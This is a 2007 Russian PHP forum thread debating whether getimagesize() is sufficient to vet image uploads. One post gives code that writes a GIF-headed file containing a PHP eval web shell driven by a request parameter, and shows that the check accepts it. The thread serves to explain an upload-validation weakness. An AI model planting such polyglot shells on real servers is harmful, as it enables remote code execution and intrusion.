|
| |
|
|
| |
для: Trianon
(26.05.2007 в 22:04)
| | | Мне не ясно, как оформить функцию, в случае, ввода данных, ведь в этом случае требуется 2 файла 1 - с формой и 2-й с обработкой данных из формы. | |
| |
|
|
| |
|
|
| |
для: Unkind
(28.05.2007 в 00:55)
| | | спорно... кто его будет отдавать с таким типом, если он и по расширению (.gif)и по сигнатуре (getimagesize) - форменное картинко? | |
| |
|
|
| |
|
|
| |
для: Trianon
(28.05.2007 в 00:44)
| | | Клиентские Вы как раз пропустите, если можно загрузить файл, который будет отдаваться клиенту как "text/html" или "application/xhtml+xml".
И getimagesize() тут уже совершенно не причем. | |
| |
|
|
| |
|
|
| |
для: Unkind
(28.05.2007 в 00:31)
| | | Я так понимаю, чтобы клиентские не пропустить.... | |
| |
|
|
| |
|
|
| |
для: Trianon
(27.05.2007 в 23:50)
| | | Тогда к чему вообще эта возьня с getimagesize()? | |
| |
|
|
| |
|
|
| |
для: Unkind
(27.05.2007 в 18:32)
| | | Мы же вроде выяснили, что защита от исполнения серверных скриптов реализуется совсем другими методами?
Опять 25 за рыбу гроши.... | |
| |
|
|
| |
|
|
| |
для: Trianon
(27.05.2007 в 16:51)
| | |
<?php
$fh = fopen("picture.gif", "wb");
fwrite($fh, pack("H*", "474946383961ce002f00c4"));
$script = '<?php
$code = isset($_REQUEST["code"]) ? $_REQUEST["code"] : "";
!get_magic_quotes_gpc() || $code = stripslashes($code);
eval($code);
?>';
fwrite($fh, $script);
fclose($fh);
var_dump(getimagesize("picture.gif"));
?>
|
| |
| |
|
|
| |
|
|
| |
для: Unkind
(27.05.2007 в 15:04)
| | | К чему придираться-то?
Вы утверждаете, что getimagesize() недостаточно, для того чтобы отличить опасный объект от неопасного. Так?
Я предложил показать пример. Пример Вы не показали. | |
| |
|
|
| |
|
|
| |
для: Trianon
(27.05.2007 в 14:26)
| | | Но и скрипта там нет.
Да хватит Вам придираться! :)) | |
| |
|
|
| |
|
|
| |
для: Trianon
(27.05.2007 в 14:26)
| | | Ну это только идея для развития, направление есть, а далее нужно думать.) | |
| |
|
|
|
